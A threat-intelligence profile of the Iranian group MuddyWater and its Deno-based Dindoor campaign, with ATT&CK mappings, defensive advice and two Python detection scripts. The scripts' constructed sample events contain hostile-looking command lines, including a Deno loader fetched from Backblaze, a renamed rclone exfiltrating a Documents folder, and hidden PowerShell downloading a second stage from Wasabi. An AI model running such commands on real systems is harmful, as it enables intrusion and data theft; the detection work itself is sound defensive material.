The Iranian Hackers Already Inside U.S. Networks — And Nobody's Talking About It

MuddyWater (Seedworm)

Iran-Backed Advanced Persistent Threat Group

MuddyWater (also known as Seedworm, MERCURY, Static Kitten, Mango Sandstorm, and TA450) is a state-sponsored cyber espionage group attributed to Iran's Ministry of Intelligence and Security (MOIS). Active since at least 2017, the group targets government, defense, telecommunications, financial, and critical infrastructure organizations across the Middle East, North America, Europe, Asia, and Africa. MuddyWater operates as a subordinate element of MOIS, conducting intelligence collection and espionage campaigns aligned with Iranian national security objectives. The group has demonstrated increasing operational sophistication, rapidly adopting new tools and techniques to evade detection.

Recent Campaign: Operation Dindoor (2026)

In early 2026, research from Broadcom's Symantec and Carbon Black Threat Hunter Team identified an active MuddyWater campaign targeting multiple U.S. organizations. Confirmed victims include U.S. banks, airports, non-profit organizations, a Canadian non-profit, and the Israeli branch of a defense and aerospace software supplier. The campaign is assessed to have intensified following U.S. and Israeli military strikes on Iran in early 2026, reflecting the group's role as a tool of Iranian state retaliation.

The campaign has contributed to a broader wave of Iranian-linked cyber espionage that is raising alarms across critical sectors in the United States. Security agencies and private researchers have observed a sharp increase in activity targeting financial institutions, aviation infrastructure, energy utilities, and the defense industrial base. The Canadian Centre for Cyber Security has issued formal advisories warning that Iran will likely leverage its cyber apparatus for retaliatory attacks against Western critical infrastructure and to conduct information operations furthering the regime's interests.

MuddyWater is not operating in isolation. Fellow Iranian APT groups — including Charming Kitten, OilRig, Agrius, Elfin, and Fox Kitten — have shown clear signs of simultaneous activation and rapid retooling, positioning themselves for coordinated retaliatory operations. Analysts at LevelBlue note that cyber capabilities are among Iran's most accessible asymmetric tools for striking back at Western nations and Gulf states. Wiper campaigns targeting Israeli energy, financial, and government sectors are already underway, with Iran's known wiper arsenal comprising more than 15 malware families. UltraViolet Cyber has characterized Iran's offensive cyber posture as a "durable instrument of state power," emphasizing that Iranian operators increasingly focus on identity and cloud control planes — using credential theft, password spraying, and persistence through enterprise services — rather than relying solely on novel zero-day exploits.

Tactics, Techniques & Procedures (TTPs)

Dindoor Backdoor

The centerpiece of the 2026 campaign is a previously unknown backdoor called Dindoor, which runs on the Deno JavaScript runtime. The choice is assessed to be deliberate: Deno is far less common in enterprise environments than Node.js, so endpoint detection rules tuned to the more familiar runtimes do not cover it. Dindoor provides remote command execution, persistent access, and data exfiltration, and it communicates over HTTPS, using the cloud storage providers Backblaze and Wasabi for payload delivery and C2 traffic. Note that Deno itself is a legitimate open-source runtime, so its presence alone is not an indicator of compromise; the signal is a runtime appearing on hosts and in paths where nobody installed it, and loading code from a remote storage bucket.

Supporting Malware & Tools

  • Fakeset: A Python-based backdoor delivered from Backblaze cloud storage, sharing digital certificates with the known MuddyWater malware families Stagecomp and Darkcomp.

  • Rclone: The open-source sync tool, used to exfiltrate large volumes of data to attacker-controlled Wasabi buckets so that the transfers blend in with legitimate cloud traffic. Rclone is also a common legitimate backup tool, so detections should key on which hosts run it and where it is pointed rather than on its presence alone.

  • Social Engineering: Spear-phishing campaigns and 'honeytrap' operations are used to establish initial access and steal credentials, targeting privileged users and administrators.
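As an added example (not code from the page, from Symantec, or from the attackers' tooling), the following Python triages Sysmon-style process-creation events for the tradecraft described above: the Deno runtime running outside development hosts or from a user-writable path, Deno executing a script fetched straight from a URL, rclone running on a host that has no business with it (including a renamed copy, caught through the OriginalFileName field that Sysmon fills from the PE version resource), and any command line naming a Backblaze B2 or Wasabi endpoint. The host allow-lists, the domain pattern, and every event are constructed assumptions.

```python
"""Triage Sysmon-style process-creation events for Dindoor-era tradecraft.

Added example, not code from the page, from Symantec or from the attackers.
Assumed: DEV_HOSTS and BACKUP_HOSTS come from inventory, the domain pattern
covers the providers named in the campaign, and every event is constructed.
"""
import re

DEV_HOSTS = {"DEV-WS-01", "DEV-WS-02"}   # assumed: hosts where Deno is expected
BACKUP_HOSTS = {"BACKUP-01"}             # assumed: hosts where rclone is expected

CLOUD_STORAGE_RE = re.compile(r"backblazeb2\.com|wasabisys\.com", re.I)
# Directories an unprivileged user can write to; a runtime dropped here is suspect.
USER_WRITABLE_RE = re.compile(r"\\(Temp|AppData|ProgramData|Public|Downloads)\\", re.I)
URL_RE = re.compile(r"https?://\S+", re.I)


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage_process_events(events):
    """Return (host, pid, rule, detail) findings for Sysmon Event ID 1-like dicts.

    Each event needs Computer, ProcessId, Image and CommandLine. OriginalFileName
    is the name from the PE version resource; if a binary carries none it is
    empty, the renamed-binary rule cannot fire, and a hash lookup is needed.
    """
    findings = []
    for ev in events:
        host, image, cmd = ev["Computer"], ev.get("Image", ""), ev.get("CommandLine", "")
        name, orig = _basename(image), ev.get("OriginalFileName", "").lower()

        def hit(rule, detail):
            findings.append((host, ev["ProcessId"], rule, detail))

        # 1. Deno where it is not expected, or launched from a user-writable path.
        if name in ("deno.exe", "deno") or orig == "deno.exe":
            if host not in DEV_HOSTS:
                hit("DENO_NON_DEV_HOST", image)
            if USER_WRITABLE_RE.search(image):
                hit("DENO_USER_WRITABLE_PATH", image)
            # 2. Script loaded straight from a URL: the loader pattern of a dropper.
            url = URL_RE.search(cmd)
            if url and re.search(r"\b(run|eval|install)\b", cmd):
                hit("DENO_REMOTE_SCRIPT", url.group(0))

        # 3. rclone, including a copy renamed to blend in (OriginalFileName survives).
        if name == "rclone.exe" or orig == "rclone.exe":
            if name != "rclone.exe":
                hit("RCLONE_RENAMED", f"{image} (OriginalFileName={orig})")
            if host not in BACKUP_HOSTS:
                hit("RCLONE_NON_BACKUP_HOST", cmd)

        # 4. Any process naming the storage providers the campaign abused.
        provider = CLOUD_STORAGE_RE.search(cmd)
        if provider:
            hit("CLOUD_STORAGE_ENDPOINT", provider.group(0))
    return findings


# Constructed sample events resembling Sysmon Event ID 1; bucket names are placeholders.
SAMPLE_EVENTS = [
    # Benign: a developer running Deno from its normal install path.
    {"Computer": "DEV-WS-01", "ProcessId": 4120, "OriginalFileName": "deno.exe",
     "Image": r"C:\Users\j.doe\.deno\bin\deno.exe",
     "CommandLine": r"deno run --allow-net main.ts"},
    # Suspicious: Deno in a user-writable directory on a finance workstation,
    # running a script pulled straight from Backblaze B2.
    {"Computer": "FIN-WS-17", "ProcessId": 5608, "OriginalFileName": "deno.exe",
     "Image": r"C:\Users\Public\Libraries\deno.exe",
     "CommandLine": r"deno.exe run -A --no-prompt https://f005.backblazeb2.com/file/bkt-example/loader.ts"},
    # Suspicious: rclone renamed to look like a Windows binary, pushing a user's
    # Documents folder to a remote defined in a dropped config file.
    {"Computer": "FIN-WS-17", "ProcessId": 5710, "OriginalFileName": "rclone.exe",
     "Image": r"C:\ProgramData\svchost_update.exe",
     "CommandLine": r"svchost_update.exe copy C:\Users\a.smith\Documents wb:exfil-example --config C:\ProgramData\r.conf -q"},
    # Benign: the backup server's scheduled rclone job.
    {"Computer": "BACKUP-01", "ProcessId": 880, "OriginalFileName": "rclone.exe",
     "Image": r"C:\Program Files\rclone\rclone.exe",
     "CommandLine": r"rclone.exe sync D:\backups wasabi:corp-backups-example"},
    # Benign: ordinary browser launch.
    {"Computer": "FIN-WS-17", "ProcessId": 3001, "OriginalFileName": "chrome.exe",
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": r"chrome.exe"},
    # Suspicious: PowerShell fetching a second stage from Wasabi.
    {"Computer": "HR-WS-03", "ProcessId": 6622, "OriginalFileName": "PowerShell.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -w hidden -c "iwr https://s3.wasabisys.com/bkt-example/stage2.bin -OutFile C:\Users\Public\stage2.bin"'},
]

if __name__ == "__main__":
    for host, pid, rule, detail in triage_process_events(SAMPLE_EVENTS):
        print(f"{host:<10} pid={pid:<5} {rule:<24} {detail}")
```

On the sample set the developer workstation and the backup server produce no findings, while the finance workstation trips the Deno rules, the cloud-storage rule and both rclone rules, and the HR workstation trips only the cloud-storage rule. The allow-lists are what keep this usable: without them, every developer and every backup job becomes noise, which is exactly the blending the attackers are counting on.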

MITRE Adversarial Tactics, Techniques, and Common Knowledge

MuddyWater's tradecraft maps to numerous ATT&CK techniques, including: T1566 (Phishing), T1059.007 (Command and Scripting Interpreter: JavaScript), T1071.001 (Application Layer Protocol: Web Protocols), T1041 (Exfiltration Over C2 Channel), T1027 (Obfuscated Files or Information), T1105 (Ingress Tool Transfer), and T1548.002 (Abuse Elevation Control Mechanism: Bypass User Account Control). The Rclone-to-Wasabi exfiltration described above fits T1567.002 (Exfiltration Over Web Service: Exfiltration to Cloud Storage) more precisely than T1041, since the data leaves over a separate channel to a third-party service rather than over the backdoor's own C2 session. The group also employs credential theft, password spraying (T1110.003), and persistence through scheduled tasks (T1053.005) and registry run keys (T1547.001).

Defensive Recommendations

  • Monitor for unexpected Deno runtime installations and executions on endpoints, particularly outside development hosts. A copy of deno.exe running from a user-writable directory, or executing a script fetched directly from a URL, warrants investigation.

  • Audit and restrict access to cloud storage services the organization does not use (Backblaze, Wasabi); allow-list the hosts and accounts with a legitimate need, such as backup servers, and review firewall and proxy logs for anomalous upload volumes to, or downloads from, those providers.

  • Deploy phishing-resistant MFA, enforce network segmentation, and conduct regular spear-phishing simulations targeting privileged accounts.

  • Patch all internet-facing assets promptly, prioritizing vulnerabilities known to be exploited by Iranian APTs (e.g., CVE-2017-7921 and CVE-2021-36260, both affecting Hikvision cameras, which are frequently exposed directly to the internet).

  • Integrate threat intelligence feeds and YARA rules for Dindoor, Fakeset, Stagecomp, and Darkcomp into security monitoring platforms.
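The proxy-log review in the second recommendation, as an added example that is not part of the original page: the Python below parses constructed space-separated proxy records, totals the bytes each client sends to and receives from Backblaze B2 and Wasabi hosts, and flags clients whose upload volume exceeds an assumed per-client daily threshold or whose traffic to those providers is almost entirely outbound. The log format, thresholds, allow-list, and every record are assumptions made for the example.

```python
"""Find clients pushing unusual volumes to Backblaze B2 or Wasabi via proxy logs.

Added example; the log format, the thresholds, the allow-list and every record
are assumptions, not data from the campaign.
"""
import re
from collections import defaultdict

# Backblaze B2 and Wasabi service domains (assumed pattern; extend as needed).
CLOUD_STORAGE_RE = re.compile(r"(^|\.)(backblazeb2|wasabisys)\.com$", re.I)

ALLOWLIST = {"10.20.9.3"}             # assumed: backup server that legitimately syncs to Wasabi
VOLUME_THRESHOLD = 25 * 1024 * 1024   # assumed: more than 25 MiB/day from one workstation is unusual
UPLOAD_RATIO = 0.95                   # assumed: sent/(sent+received) above this is upload-dominated
MIN_SENT_FOR_RATIO = 1024 * 1024      # ignore tiny sessions when applying the ratio rule

# Constructed records: time client method host:port bytes_sent bytes_received status
SAMPLE_PROXY_LOG = """\
2026-03-02T09:01:12Z 10.20.5.17 GET www.example.com:443 812 48211 200
2026-03-02T09:03:40Z 10.20.5.17 PUT s3.us-west-004.backblazeb2.com:443 52428800 311 200
2026-03-02T09:05:02Z 10.20.5.17 PUT s3.us-west-004.backblazeb2.com:443 52428800 311 200
2026-03-02T09:06:31Z 10.20.5.17 PUT s3.us-west-004.backblazeb2.com:443 52428800 311 200
2026-03-02T10:12:09Z 10.20.7.44 GET s3.wasabisys.com:443 640 2097152 200
2026-03-02T11:30:55Z 10.20.8.8 POST s3.eu-central-1.wasabisys.com:443 5242880 250 200
2026-03-02T12:00:00Z 10.20.8.8 GET www.example.com:443 700 90000 200
2026-03-03T02:00:03Z 10.20.9.3 PUT s3.wasabisys.com:443 4294967296 4096 200
"""


def parse_proxy_log(text):
    """Parse the assumed space-separated proxy format into dicts."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, method, hostport, sent, recv, status = line.split()
        records.append({
            "time": ts, "client": client, "method": method.upper(),
            "host": hostport.rsplit(":", 1)[0],
            "sent": int(sent), "recv": int(recv), "status": int(status),
        })
    return records


def cloud_upload_summary(records):
    """Aggregate per-client bytes exchanged with the cloud storage providers."""
    summary = defaultdict(lambda: {"sent": 0, "recv": 0, "requests": 0, "hosts": set()})
    for r in records:
        if not CLOUD_STORAGE_RE.search(r["host"]):
            continue
        s = summary[r["client"]]
        s["sent"] += r["sent"]
        s["recv"] += r["recv"]
        s["requests"] += 1
        s["hosts"].add(r["host"])
    return dict(summary)


def flag_exfil(summary):
    """Return {client: [reasons]} for clients whose cloud traffic looks like exfiltration."""
    flagged = {}
    for client, s in summary.items():
        if client in ALLOWLIST:          # known backup job: reviewed separately, not alerted
            continue
        reasons = []
        if s["sent"] > VOLUME_THRESHOLD:
            reasons.append("UPLOAD_VOLUME")
        total = s["sent"] + s["recv"]
        if s["sent"] >= MIN_SENT_FOR_RATIO and total and s["sent"] / total > UPLOAD_RATIO:
            reasons.append("UPLOAD_DOMINATED")
        if reasons:
            flagged[client] = reasons
    return flagged


if __name__ == "__main__":
    summary = cloud_upload_summary(parse_proxy_log(SAMPLE_PROXY_LOG))
    for client, reasons in flag_exfil(summary).items():
        print(client, reasons, sorted(summary[client]["hosts"]), summary[client]["sent"])
```

On the sample log the finance workstation at 10.20.5.17 is flagged on both rules (three 50 MiB PUTs to Backblaze B2 with almost nothing coming back), 10.20.8.8 is flagged only as upload-dominated (a 5 MiB POST to Wasabi that stays under the volume threshold), the host that merely downloaded a file from Wasabi is not flagged, and the allow-listed backup server is skipped despite its 4 GiB sync. The ratio rule is what catches a patient operator who keeps each day's volume small; a downloads-only client is what normal use of these providers usually looks like.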

Guidance for Individuals

While MuddyWater primarily targets organizations rather than individuals, everyday employees at companies in critical sectors — finance, defense, aviation, technology, and nonprofits — can serve as entry points through spear-phishing and social engineering, which are the group's preferred methods of initial access. The following personal security habits significantly reduce that risk:

  • Be skeptical of unsolicited emails, messages, and connection requests. MuddyWater is known for highly convincing spear-phishing and 'honeytrap' social engineering. If someone reaches out unexpectedly with an attachment or link, verify through a separate channel before engaging.

  • Use strong, unique passwords and a password manager. Credential theft is a core MuddyWater technique, and reusing passwords across work and personal accounts turns one stolen password into access to many systems.

  • Enable multi-factor authentication (MFA) on all work accounts, email, and any systems tied to your employer. Hardware-based or phishing-resistant MFA is strongly preferred over SMS-based options.

  • Do not install unknown software or runtimes on work devices. The campaign's initial access depends on a user running what a lure delivers; if your IT department did not deploy it, do not run it.

  • Keep all personal and work devices patched and updated. Many Iranian APT intrusions exploit known vulnerabilities for which vendors have already issued fixes.
